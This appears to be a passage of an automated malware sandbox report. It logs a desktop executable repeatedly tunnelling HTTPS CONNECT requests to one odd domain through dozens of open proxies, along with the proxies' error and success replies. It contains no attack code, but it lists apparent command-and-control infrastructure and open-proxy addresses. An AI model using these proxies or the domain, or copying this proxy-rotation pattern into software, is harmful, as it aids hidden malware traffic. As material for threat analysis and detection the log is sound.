                                                                                                      Feb 23, 2024 09:45:23.866131067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.975126982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.178900003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.365931034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.681828976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      637192.168.2.45111354.39.50.68245356812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.477788925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.475013018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.475271940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.475481033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      638192.168.2.452127172.245.16.47156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.492618084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      639192.168.2.451941200.43.231.841536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.496273994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      640192.168.2.451131189.240.60.16990906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.496685028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.688967943 CET72INHTTP/1.1 200 Connection established
                                                                                                      Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      641192.168.2.451878171.247.98.9010806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.503812075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      642192.168.2.451101141.94.174.6402806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.503966093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      643192.168.2.452091113.30.149.76806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.504302025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      644192.168.2.451922103.163.51.254806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.506006002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      645192.168.2.451115178.128.200.87806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.509670973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.578538895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.700186014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.834665060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.834351063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:57.834278107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:09.904184103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      646192.168.2.45215445.12.31.104806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.511446953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.598742962 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      647192.168.2.451931103.153.154.6806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.512856960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.827050924 CET343INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 182
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      648192.168.2.452145162.223.91.11806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.514204979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.287501097 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      649192.168.2.452118104.223.45.93806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.514388084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.682822943 CET835INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Server: squid
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 424
                                                                                                      X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                                                                                                      Proxy-Authenticate: Basic realm=""Proxy""
                                                                                                      X-Cache: MISS from us1814.tmobatt.com
                                                                                                      X-Cache-Lookup: NONE from us1814.tmobatt.com:80
                                                                                                      Via: 1.1 us1814.tmobatt.com (squid)
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 45 52 52 4f 52 3a 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 68 31 3e 0a 09 09 3c 68 34 3e 45 72 72 6f 72 20 63 6f 64 65 3a 20 30 32 3c 2f 68 34 3e 0a 09 09 3c 68 34 3e 44 61 74 65 3a 20 46 72 69 2c 20 32 33 20 46 65 62 20 32 30 32 34 20 30 38 3a 34 35 3a 32 31 20 47 4d 54 3c 2f 68 34 3e 0a 09 09 3c 68 34 3e 52 65 71 75 65 73 74 3a 20 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 68 34 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Access Denied</title></head><body><h1>ERROR: Access Denied</h1><h4>Error code: 02</h4><h4>Date: Fri, 23 Feb 2024 08:45:21 GMT</h4><h4>Request: https://heygirlisheeverythingyouwantedinaman.com/*</h4></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      650192.168.2.451002103.139.25.12180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.516743898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.578572989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      651192.168.2.452063193.136.97.17806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.520462036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.178138971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.866143942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.178441048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.865880013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.475153923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.179179907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.368462086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:47.474905968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      652192.168.2.45211737.48.120.14631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.520787954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.098526955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.612669945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.647265911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.716630936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.834606886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.835026026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.834892035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.804964066 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      653192.168.2.451203190.120.250.739996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.528192997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.680871964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.865858078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.470381975 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      654192.168.2.451254184.178.172.2341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.528309107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      655192.168.2.451913218.75.102.19880006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.538022995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      656192.168.2.452132192.169.226.96320746812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.538278103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.098498106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      657192.168.2.451988211.222.252.18781936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.545049906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      658192.168.2.451934103.216.50.14380806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.561141968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.919680119 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      659192.168.2.45213454.38.176.200128826812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.561876059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.178044081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      660192.168.2.451225213.157.112.6680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.564560890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.680804014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.865868092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.866118908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      661192.168.2.452181104.17.248.164806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.564763069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.652230024 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
